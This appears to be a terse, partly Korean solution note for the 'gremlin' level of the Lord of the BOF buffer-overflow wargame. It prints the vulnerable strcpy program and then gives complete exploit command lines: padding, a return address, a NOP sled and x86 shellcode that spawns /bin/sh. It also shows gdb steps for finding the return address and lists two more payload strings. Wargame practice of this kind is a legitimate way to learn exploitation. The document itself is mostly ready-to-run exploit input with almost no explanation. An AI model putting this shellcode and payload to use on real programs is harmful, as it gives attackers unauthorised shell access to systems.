gate gate

cat ./gremlin.c
-------------------------------------------------------
/*
        The Lord of the BOF : The Fellowship of the BOF
        - gremlin
        - simple BOF
*/

int main(int argc, char *argv[])
{
    char buffer[256];
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
-------------------------------------------------------
bash2   중요

cp ./gremlin ./gremliX 
파일명 `python -c 'print [버퍼오버플로워발생]+[RET]+[NOP]+[shellcode]'`

./gremliX `python -c 'print "A"*260+"\xbf\xbf\xbf\xbf"+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

gdb -c ./core
	x/1000x $esp+600
	//NOP끝나는 주소 확인
	//적절한 주소를 ret에 넣어서 페이로드 완성
	
./gremliX `python -c 'print "A"*260+"\x30\xfc\xff\xbf"+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
./gremlin `python -c 'print "A"*260+"\x30\xfc\xff\xbf"+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`




"A"*16+"\x48\xfb\xff\xbf"+"\x34\xfb\xff\xbf"+"\x90"*10+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
"A"*20+"\x50\x00\x4c\x45"+"\x90"*10+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

 